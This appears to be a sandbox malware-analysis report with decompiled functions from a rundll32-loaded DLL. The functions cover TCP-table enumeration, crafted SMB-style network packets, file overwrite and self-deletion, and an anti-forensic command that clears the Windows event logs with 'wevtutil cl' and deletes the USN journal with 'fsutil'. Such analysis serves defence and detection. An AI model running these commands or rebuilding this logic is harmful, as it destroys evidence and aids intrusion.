                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryW.KERNEL32(iphlpapi.dll,00000000), ref: 0477734A
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetExtendedTcpTable), ref: 04777363
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00100000), ref: 0477737E
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 04777385
                                                                                                                                                  • GetExtendedTcpTable.IPHLPAPI(00000000,?,00000000,00000002,00000001,00000000), ref: 047773A3
                                                                                                                                                  • wsprintfW.USER32 ref: 047773DC
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04777405
                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000), ref: 0477740C
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04777856), ref: 04777414
                                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 0477741D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$FreeLibraryProcess$AddressAllocateErrorExtendedLastLoadProcTablewsprintf
                                                                                                                                                  • String ID: %u.%u.%u.%u$GetExtendedTcpTable$iphlpapi.dll
                                                                                                                                                  • API String ID: 2031097080-442984071
                                                                                                                                                  • Opcode ID: 48b3274f8d9c52b51a7f532372f62792717fc40ab27beb9ca393006cb2d65a3e
                                                                                                                                                  • Instruction ID: fbbc3939e65e8364c9137aef7b809caa234976ed023992524241597107d3378f
                                                                                                                                                  • Opcode Fuzzy Hash: 48b3274f8d9c52b51a7f532372f62792717fc40ab27beb9ca393006cb2d65a3e
                                                                                                                                                  • Instruction Fuzzy Hash: 2521A672A40215ABDB215FE4CD48EAEBBBCEF48301F944965F542E6241E778F901CB60
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                                  			E04771EB9(intOrPtr _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				long _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				signed short _v20;
                                                                                                                                                  				void* _t49;
                                                                                                                                                  				intOrPtr* _t51;
                                                                                                                                                  				intOrPtr* _t53;
                                                                                                                                                  				signed short _t56;
                                                                                                                                                  				long _t58;
                                                                                                                                                  				void* _t66;
                                                                                                                                                  				void* _t71;
                                                                                                                                                  				intOrPtr* _t72;
                                                                                                                                                  				intOrPtr* _t74;
                                                                                                                                                  				void* _t77;
                                                                                                                                                  				intOrPtr* _t78;
                                                                                                                                                  				intOrPtr* _t80;
                                                                                                                                                  				void* _t82;
                                                                                                                                                  				void* _t88;
                                                                                                                                                  				intOrPtr _t89;
                                                                                                                                                  				void* _t90;
                                                                                                                                                  				signed int _t91;
                                                                                                                                                  				char _t93;
                                                                                                                                                  				intOrPtr _t94;
                                                                                                                                                  				short _t95;
                                                                                                                                                  				intOrPtr _t96;
                                                                                                                                                  				char _t97;
                                                                                                                                                  				intOrPtr _t98;
                                                                                                                                                  				intOrPtr _t99;
                                                                                                                                                  				void* _t101;
                                                                                                                                                  				intOrPtr _t102;
                                                                                                                                                  				intOrPtr* _t103;
                                                                                                                                                  				void* _t104;
                                                                                                                                                  				void* _t106;
                                                                                                                                                  				void* _t112;
                                                                                                                                                  				intOrPtr* _t118;
                                                                                                                                                  				void* _t119;
                                                                                                                                                  				void* _t120;
                                                                                                                                                  				intOrPtr* _t121;
                                                                                                                                                  				void* _t122;
                                                                                                                                                  				void* _t124;
                                                                                                                                                  
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_t49 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                  				_v16 = _t49;
                                                                                                                                                  				if(_t49 == 0) {
                                                                                                                                                  					L24:
                                                                                                                                                  					return _v5;
                                                                                                                                                  				}
                                                                                                                                                  				_t51 = _a12;
                                                                                                                                                  				_t101 = _t51 + 1;
                                                                                                                                                  				do {
                                                                                                                                                  					_t89 =  *_t51;
                                                                                                                                                  					_t51 = _t51 + 1;
                                                                                                                                                  				} while (_t89 != 0);
                                                                                                                                                  				_t90 = _t51 - _t101;
                                                                                                                                                  				_t53 = _a16;
                                                                                                                                                  				_t106 = _t53 + 1;
                                                                                                                                                  				do {
                                                                                                                                                  					_t102 =  *_t53;
                                                                                                                                                  					_t53 = _t53 + 1;
                                                                                                                                                  				} while (_t102 != 0);
                                                                                                                                                  				_t56 = _t90 + _t53 - _t106 + 0x0000000b & 0x0000ffff;
                                                                                                                                                  				_v20 = _t56;
                                                                                                                                                  				_t58 = (_t56 & 0x0000ffff) + 0x2f;
                                                                                                                                                  				_v12 = _t58;
                                                                                                                                                  				_t88 = HeapAlloc(GetProcessHeap(), 8, _t58);
                                                                                                                                                  				if(_t88 == 0) {
                                                                                                                                                  					L23:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                                                                  					goto L24;
                                                                                                                                                  				}
                                                                                                                                                  				_t91 = 9;
                                                                                                                                                  				_t66 = memcpy(_t88,  *_a8, _t91 << 2);
                                                                                                                                                  				__imp__#9(_v12 + 0xfffffffc);
                                                                                                                                                  				_t103 = _a12;
                                                                                                                                                  				 *(_t88 + 2) = _t66;
                                                                                                                                                  				 *((short*)(_t88 + 0x2b)) = 1;
                                                                                                                                                  				 *((short*)(_t88 + 0x2d)) = _v20;
                                                                                                                                                  				 *((char*)(_t88 + 8)) = 0x75;
                                                                                                                                                  				 *((short*)(_t88 + 0x24)) = 0xff04;
                                                                                                                                                  				asm("movsw");
                                                                                                                                                  				_t22 = _t88 + 0x32; // 0x32
                                                                                                                                                  				asm("movsb");
                                                                                                                                                  				_t118 = _t103;
                                                                                                                                                  				_t71 = _t22 - _t103;
                                                                                                                                                  				do {
                                                                                                                                                  					_t93 =  *_t118;
                                                                                                                                                  					 *((char*)(_t71 + _t118)) = _t93;
                                                                                                                                                  					_t118 = _t118 + 1;
                                                                                                                                                  				} while (_t93 != 0);
                                                                                                                                                  				_t72 = _t103;
                                                                                                                                                  				_t119 = _t72 + 1;
                                                                                                                                                  				do {
                                                                                                                                                  					_t94 =  *_t72;
                                                                                                                                                  					_t72 = _t72 + 1;
                                                                                                                                                  				} while (_t94 != 0);
                                                                                                                                                  				_t95 = 0x5c;
                                                                                                                                                  				 *((short*)(_t72 - _t119 + _t88 + 0x32)) = _t95;
                                                                                                                                                  				_t74 = _t103;
                                                                                                                                                  				_t120 = _t74 + 1;
                                                                                                                                                  				do {
                                                                                                                                                  					_t96 =  *_t74;
                                                                                                                                                  					_t74 = _t74 + 1;
                                                                                                                                                  				} while (_t96 != 0);
                                                                                                                                                  				_t121 = _a16;
                                                                                                                                                  				_t77 = _t74 - _t120 + _t88 + 0x33 - _t121;
                                                                                                                                                  				do {
                                                                                                                                                  					_t97 =  *_t121;
                                                                                                                                                  					 *((char*)(_t77 + _t121)) = _t97;
                                                                                                                                                  					_t121 = _t121 + 1;
                                                                                                                                                  				} while (_t97 != 0);
                                                                                                                                                  				_t78 = _t103;
                                                                                                                                                  				_t104 = _t78 + 1;
                                                                                                                                                  				do {
                                                                                                                                                  					_t98 =  *_t78;
                                                                                                                                                  					_t78 = _t78 + 1;
                                                                                                                                                  				} while (_t98 != 0);
                                                                                                                                                  				_t122 = _t78 - _t104;
                                                                                                                                                  				_t80 = _a16;
                                                                                                                                                  				_t112 = _t80 + 1;
                                                                                                                                                  				do {
                                                                                                                                                  					_t99 =  *_t80;
                                                                                                                                                  					_t80 = _t80 + 1;
                                                                                                                                                  				} while (_t99 != 0);
                                                                                                                                                  				_t82 = _t80 - _t112 + _t122;
                                                                                                                                                  				asm("movsd");
                                                                                                                                                  				asm("movsw");
                                                                                                                                                  				__imp__#19(_a4, _t88, _v12, 0); // executed
                                                                                                                                                  				if(_t82 > 0) {
                                                                                                                                                  					_t124 = _v16;
                                                                                                                                                  					__imp__#16(_a4, _t124, 0xffff, 0); // executed
                                                                                                                                                  					if(_t82 > 0 &&  *((intOrPtr*)(_t124 + 9)) == 0) {
                                                                                                                                                  						 *((short*)( *_a8 + 0x1c)) =  *((intOrPtr*)(_t124 + 0x1c));
                                                                                                                                                  						_v5 = 1;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				HeapFree(GetProcessHeap(), 8, _t88);
                                                                                                                                                  				goto L23;
                                                                                                                                                  			}











































                                                                                                                                                  0x04771ece
                                                                                                                                                  0x04771edb
                                                                                                                                                  0x04771edd
                                                                                                                                                  0x04771ee2
                                                                                                                                                  0x0477204b
                                                                                                                                                  0x04772051
                                                                                                                                                  0x04772051
                                                                                                                                                  0x04771ee8
                                                                                                                                                  0x04771eeb
                                                                                                                                                  0x04771eee
                                                                                                                                                  0x04771eee
                                                                                                                                                  0x04771ef0
                                                                                                                                                  0x04771ef1
                                                                                                                                                  0x04771ef7
                                                                                                                                                  0x04771ef9
                                                                                                                                                  0x04771efd
                                                                                                                                                  0x04771f00
                                                                                                                                                  0x04771f00
                                                                                                                                                  0x04771f02
                                                                                                                                                  0x04771f03
                                                                                                                                                  0x04771f0d
                                                                                                                                                  0x04771f10
                                                                                                                                                  0x04771f16
                                                                                                                                                  0x04771f1c
                                                                                                                                                  0x04771f24
                                                                                                                                                  0x04771f28
                                                                                                                                                  0x04772038
                                                                                                                                                  0x04772044
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0477204a
                                                                                                                                                  0x04771f38
                                                                                                                                                  0x04771f3f
                                                                                                                                                  0x04771f41
                                                                                                                                                  0x04771f47
                                                                                                                                                  0x04771f4a
                                                                                                                                                  0x04771f51
                                                                                                                                                  0x04771f59
                                                                                                                                                  0x04771f5d
                                                                                                                                                  0x04771f61
                                                                                                                                                  0x04771f6f
                                                                                                                                                  0x04771f71
                                                                                                                                                  0x04771f74
                                                                                                                                                  0x04771f75
                                                                                                                                                  0x04771f77
                                                                                                                                                  0x04771f79
                                                                                                                                                  0x04771f79
                                                                                                                                                  0x04771f7b
                                                                                                                                                  0x04771f7e
                                                                                                                                                  0x04771f7f
                                                                                                                                                  0x04771f83
                                                                                                                                                  0x04771f85
                                                                                                                                                  0x04771f88
                                                                                                                                                  0x04771f88
                                                                                                                                                  0x04771f8a
                                                                                                                                                  0x04771f8b
                                                                                                                                                  0x04771f93
                                                                                                                                                  0x04771f94
                                                                                                                                                  0x04771f99
                                                                                                                                                  0x04771f9b
                                                                                                                                                  0x04771f9e
                                                                                                                                                  0x04771f9e
                                                                                                                                                  0x04771fa0
                                                                                                                                                  0x04771fa1
                                                                                                                                                  0x04771fa7
                                                                                                                                                  0x04771fae
                                                                                                                                                  0x04771fb0
                                                                                                                                                  0x04771fb0
                                                                                                                                                  0x04771fb2
                                                                                                                                                  0x04771fb5
                                                                                                                                                  0x04771fb6
                                                                                                                                                  0x04771fba
                                                                                                                                                  0x04771fbc
                                                                                                                                                  0x04771fbf
                                                                                                                                                  0x04771fbf
                                                                                                                                                  0x04771fc1
                                                                                                                                                  0x04771fc2
                                                                                                                                                  0x04771fc8
                                                                                                                                                  0x04771fca
                                                                                                                                                  0x04771fcd
                                                                                                                                                  0x04771fd0
                                                                                                                                                  0x04771fd0
                                                                                                                                                  0x04771fd2
                                                                                                                                                  0x04771fd3
                                                                                                                                                  0x04771fd9
                                                                                                                                                  0x04771fe4
                                                                                                                                                  0x04771fe5
                                                                                                                                                  0x04771ff1
                                                                                                                                                  0x04771ff9
                                                                                                                                                  0x04771ffb
                                                                                                                                                  0x04772008
                                                                                                                                                  0x04772010
                                                                                                                                                  0x04772020
                                                                                                                                                  0x04772024
                                                                                                                                                  0x04772024
                                                                                                                                                  0x04772010
                                                                                                                                                  0x04772032
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000FFFF,00000000,00000000,00000000,00000000,?,0BADF00D,?,?,?,?,0477943A), ref: 04771ED2
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,0477943A), ref: 04771EDB
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,0477943A), ref: 04771F1F
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,0477943A), ref: 04771F22
                                                                                                                                                  • htons.WS2_32(?), ref: 04771F41
                                                                                                                                                  • send.WS2_32(?,00000000,?,00000000), ref: 04771FF1
                                                                                                                                                  • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04772008
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0477943A), ref: 0477202B
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,0477943A), ref: 04772032
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,0477943A), ref: 0477203D
                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,0477943A), ref: 04772044
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFree$htonsrecvsend
                                                                                                                                                  • String ID: ?????
                                                                                                                                                  • API String ID: 1780562090-2358547729
                                                                                                                                                  • Opcode ID: e5ae3337f0678c22eb48104da0395f8653b0f6650a35cdfb49fc5620348d367e
                                                                                                                                                  • Instruction ID: 548754647173568064254321332dc0c4640c5769ffac12b8859bd8a57a269b27
                                                                                                                                                  • Opcode Fuzzy Hash: e5ae3337f0678c22eb48104da0395f8653b0f6650a35cdfb49fc5620348d367e
                                                                                                                                                  • Instruction Fuzzy Hash: 5F510535A002469FDF218F68C848AEA7BF5EF4A340B458595FD84EB352DB35E809C750
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04779154(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                  				long _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				int _t16;
                                                                                                                                                  				void* _t18;
                                                                                                                                                  				int _t19;
                                                                                                                                                  				void* _t22;
                                                                                                                                                  				void* _t24;
                                                                                                                                                  				void* _t31;
                                                                                                                                                  
                                                                                                                                                  				_t16 = FreeLibrary( *0x4787b98); // executed
                                                                                                                                                  				 *0x4787b8c = _t16;
                                                                                                                                                  				if(_t16 == 0) {
                                                                                                                                                  					return _t16;
                                                                                                                                                  				}
                                                                                                                                                  				_t31 = CreateFileW;
                                                                                                                                                  				 *0x4787b98 =  *0x4787bb4; // executed
                                                                                                                                                  				_t18 = CreateFileW(0x4787bc8, 0x80000000, 1, 0, 3, 0, 0); // executed
                                                                                                                                                  				_v12 = _t18;
                                                                                                                                                  				if(_t18 != 0) {
                                                                                                                                                  					_v8 = GetFileSize(_t18, 0);
                                                                                                                                                  					FindCloseChangeNotification(_v12); // executed
                                                                                                                                                  					_t22 = CreateFileW(0x4787bc8, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                                                                  					_v12 = _t22;
                                                                                                                                                  					if(_t22 != 0) {
                                                                                                                                                  						_t31 = GetProcessHeap;
                                                                                                                                                  						_t24 = RtlAllocateHeap(GetProcessHeap(), 8, _v8); // executed
                                                                                                                                                  						_v16 = _t24;
                                                                                                                                                  						if(_t24 != 0) {
                                                                                                                                                  							_t30 =  &_v8;
                                                                                                                                                  							WriteFile(_v12, _t24, _v8,  &_v8, 0); // executed
                                                                                                                                                  							HeapFree(GetProcessHeap(), 0, _v16);
                                                                                                                                                  						}
                                                                                                                                                  						CloseHandle(_v12);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t19 = DeleteFileW(0x4787bc8); // executed
                                                                                                                                                  				 *0x4787b84 = _t19; // executed
                                                                                                                                                  				_t16 = E04779016(); // executed
                                                                                                                                                  				if(_t16 != 0) {
                                                                                                                                                  					_t16 = E047779D7(0x4787bc8, _t30, _t31, _a4, _a8, _a12, _a16); // executed
                                                                                                                                                  				}
                                                                                                                                                  				ExitProcess(0);
                                                                                                                                                  			}












                                                                                                                                                  0x04779161
                                                                                                                                                  0x04779169
                                                                                                                                                  0x04779170
                                                                                                                                                  0x0477923c
                                                                                                                                                  0x0477923c
                                                                                                                                                  0x0477917b
                                                                                                                                                  0x04779193
                                                                                                                                                  0x04779198
                                                                                                                                                  0x0477919a
                                                                                                                                                  0x0477919f
                                                                                                                                                  0x047791ac
                                                                                                                                                  0x047791af
                                                                                                                                                  0x047791c1
                                                                                                                                                  0x047791c3
                                                                                                                                                  0x047791c8
                                                                                                                                                  0x047791cd
                                                                                                                                                  0x047791d8
                                                                                                                                                  0x047791de
                                                                                                                                                  0x047791e3
                                                                                                                                                  0x047791e6
                                                                                                                                                  0x047791f1
                                                                                                                                                  0x047791fe
                                                                                                                                                  0x047791fe
                                                                                                                                                  0x04779207
                                                                                                                                                  0x04779207
                                                                                                                                                  0x047791c8
                                                                                                                                                  0x0477920e
                                                                                                                                                  0x04779214
                                                                                                                                                  0x04779219
                                                                                                                                                  0x04779220
                                                                                                                                                  0x0477922e
                                                                                                                                                  0x0477922e
                                                                                                                                                  0x04779234

                                                                                                                                                  APIs
                                                                                                                                                  • FreeLibrary.KERNELBASE ref: 04779161
                                                                                                                                                  • CreateFileW.KERNELBASE(04787BC8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04779198
                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 047791A3
                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 047791AF
                                                                                                                                                  • CreateFileW.KERNELBASE(04787BC8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 047791C1
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 047791D5
                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 047791D8
                                                                                                                                                  • WriteFile.KERNELBASE(?,00000000,?,?,00000000), ref: 047791F1
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 047791FB
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 047791FE
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 04779207
                                                                                                                                                  • DeleteFileW.KERNELBASE(04787BC8), ref: 0477920E
                                                                                                                                                  • ExitProcess.KERNEL32 ref: 04779234
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Heap$Process$CloseCreateFree$AllocateChangeDeleteExitFindHandleLibraryNotificationSizeWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1556359713-0
                                                                                                                                                  • Opcode ID: d303b9e07aa8216eb87cf8bc6ebf3149a3dbebc594b8c437868222b4e8844ff0
                                                                                                                                                  • Instruction ID: af64393a5e8635c425b780c5a69af2b2751a0dedf879038695dd5d71d1f9a8e0
                                                                                                                                                  • Opcode Fuzzy Hash: d303b9e07aa8216eb87cf8bc6ebf3149a3dbebc594b8c437868222b4e8844ff0
                                                                                                                                                  • Instruction Fuzzy Hash: 06214FB1802214BBEF216FA1AE4CDCEBF79EF49350F618454F706A2110D639D911DBA0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                  			E0477808E() {
                                                                                                                                                  				short _v524;
                                                                                                                                                  				short _v526;
                                                                                                                                                  				short _v2572;
                                                                                                                                                  				void _t22;
                                                                                                                                                  				void* _t30;
                                                                                                                                                  				signed int _t32;
                                                                                                                                                  				void* _t35;
                                                                                                                                                  				WCHAR* _t38;
                                                                                                                                                  
                                                                                                                                                  				_v524 = 0;
                                                                                                                                                  				_t38 = L"%wswevtutil cl %ws & ";
                                                                                                                                                  				wsprintfW( &_v524, _t38,  &_v524, L"Setup");
                                                                                                                                                  				wsprintfW( &_v524, _t38,  &_v524, L"System");
                                                                                                                                                  				wsprintfW( &_v524, _t38,  &_v524, L"Security");
                                                                                                                                                  				wsprintfW( &_v524, _t38,  &_v524, L"Application");
                                                                                                                                                  				_t35 =  &_v524 - 2;
                                                                                                                                                  				do {
                                                                                                                                                  					_t22 =  *(_t35 + 2);
                                                                                                                                                  					_t35 = _t35 + 2;
                                                                                                                                                  				} while (_t22 != 0);
                                                                                                                                                  				_t32 = 0x10;
                                                                                                                                                  				_push( *0x4787bc8 & 0x0000ffff);
                                                                                                                                                  				memcpy(_t35, L"fsutil usn deletejournal /D %c:", _t32 << 2);
                                                                                                                                                  				wsprintfW( &_v2572,  &_v524);
                                                                                                                                                  				_v526 = 0;
                                                                                                                                                  				_t30 = E04777FB7( &_v2572, 3); // executed
                                                                                                                                                  				return _t30;
                                                                                                                                                  			}











                                                                                                                                                  0x047780a2
                                                                                                                                                  0x047780b5
                                                                                                                                                  0x047780bc
                                                                                                                                                  0x047780cc
                                                                                                                                                  0x047780dc
                                                                                                                                                  0x047780ec
                                                                                                                                                  0x047780f7
                                                                                                                                                  0x047780fa
                                                                                                                                                  0x047780fa
                                                                                                                                                  0x047780fe
                                                                                                                                                  0x04778101
                                                                                                                                                  0x0477810f
                                                                                                                                                  0x04778110
                                                                                                                                                  0x04778124
                                                                                                                                                  0x04778126
                                                                                                                                                  0x0477812d
                                                                                                                                                  0x0477813d
                                                                                                                                                  0x04778146

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: wsprintf
                                                                                                                                                  • String ID: %wswevtutil cl %ws & $Application$Security$Setup$System$fsutil usn deletejournal /D %c:
                                                                                                                                                  • API String ID: 2111968516-1905612841
                                                                                                                                                  • Opcode ID: 986192826c8f90fc371eec64463369b3cc5e1b90df056cc7908b66dc1617e365
                                                                                                                                                  • Instruction ID: 9633cb40a234e12e106bc7ca96e2096bc935df85812372c3c4ac5cfc9a1e5025
                                                                                                                                                  • Opcode Fuzzy Hash: 986192826c8f90fc371eec64463369b3cc5e1b90df056cc7908b66dc1617e365
                                                                                                                                                  • Instruction Fuzzy Hash: 5E11E9B6E4032C7ADB20E6A4CC89EE777BCDF44650F4005A5F958E3200EA34EE858B75
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 39%
                                                                                                                                                  			E04771DD1(void* __ecx, intOrPtr _a4, void** _a8) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				void* _t20;
                                                                                                                                                  				void* _t27;
                                                                                                                                                  				void* _t35;
                                                                                                                                                  				signed int _t38;
                                                                                                                                                  				void* _t47;
                                                                                                                                                  
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_t20 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                  				_v12 = _t20;
                                                                                                                                                  				if(_t20 != 0) {
                                                                                                                                                  					_t35 = HeapAlloc(GetProcessHeap(), 8, 0x2b);
                                                                                                                                                  					if(_t35 != 0) {
                                                                                                                                                  						_t38 = 9;
                                                                                                                                                  						_t27 = memcpy(_t35,  *_a8, _t38 << 2);
                                                                                                                                                  						__imp__#9(0x27);
                                                                                                                                                  						 *(_t35 + 2) = _t27;
                                                                                                                                                  						 *((char*)(_t35 + 8)) = 0x74;
                                                                                                                                                  						 *((short*)(_t35 + 0x24)) = 0xff02;
                                                                                                                                                  						 *((char*)(_t35 + 0x26)) = 0x42;
                                                                                                                                                  						 *((short*)(_t35 + 0x27)) = 0x4559;
                                                                                                                                                  						__imp__#19(_a4, _t35, 0x2b, 0); // executed
                                                                                                                                                  						if(0x4559 > 0) {
                                                                                                                                                  							_t47 = _v12;
                                                                                                                                                  							__imp__#16(_a4, _t47, 0xffff, 0); // executed
                                                                                                                                                  							if(0x4559 > 0 &&  *((intOrPtr*)(_t47 + 9)) == 0) {
                                                                                                                                                  								 *((short*)( *_a8 + 0x20)) = 0;
                                                                                                                                                  								memset(_t47, 0, 0xffff);
                                                                                                                                                  								_v5 = 1;
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						HeapFree(GetProcessHeap(), 8, _t35);
                                                                                                                                                  					}
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                  				}
                                                                                                                                                  				return _v5;
                                                                                                                                                  			}










                                                                                                                                                  0x04771de5
                                                                                                                                                  0x04771df2
                                                                                                                                                  0x04771df4
                                                                                                                                                  0x04771df9
                                                                                                                                                  0x04771e09
                                                                                                                                                  0x04771e0d
                                                                                                                                                  0x04771e1a
                                                                                                                                                  0x04771e1f
                                                                                                                                                  0x04771e21
                                                                                                                                                  0x04771e2f
                                                                                                                                                  0x04771e38
                                                                                                                                                  0x04771e3c
                                                                                                                                                  0x04771e42
                                                                                                                                                  0x04771e46
                                                                                                                                                  0x04771e4a
                                                                                                                                                  0x04771e52
                                                                                                                                                  0x04771e54
                                                                                                                                                  0x04771e63
                                                                                                                                                  0x04771e6b
                                                                                                                                                  0x04771e7d
                                                                                                                                                  0x04771e81
                                                                                                                                                  0x04771e89
                                                                                                                                                  0x04771e89
                                                                                                                                                  0x04771e6b
                                                                                                                                                  0x04771e97
                                                                                                                                                  0x04771e97
                                                                                                                                                  0x04771ea9
                                                                                                                                                  0x04771eaf
                                                                                                                                                  0x04771eb6

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,047754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04771DE9
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,047754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04771DF2
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000002B,00000000,?,?,?,047754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04771E04
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,047754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04771E07
                                                                                                                                                  • htons.WS2_32(00000027), ref: 04771E21
                                                                                                                                                  • send.WS2_32(?,00000000,0000002B,00000000), ref: 04771E4A
                                                                                                                                                  • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04771E63
                                                                                                                                                  • memset.MSVCRT ref: 04771E81
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,047754D7,00000000,?,00000000,?,00000000,00000000,?,0BADF00D), ref: 04771E90
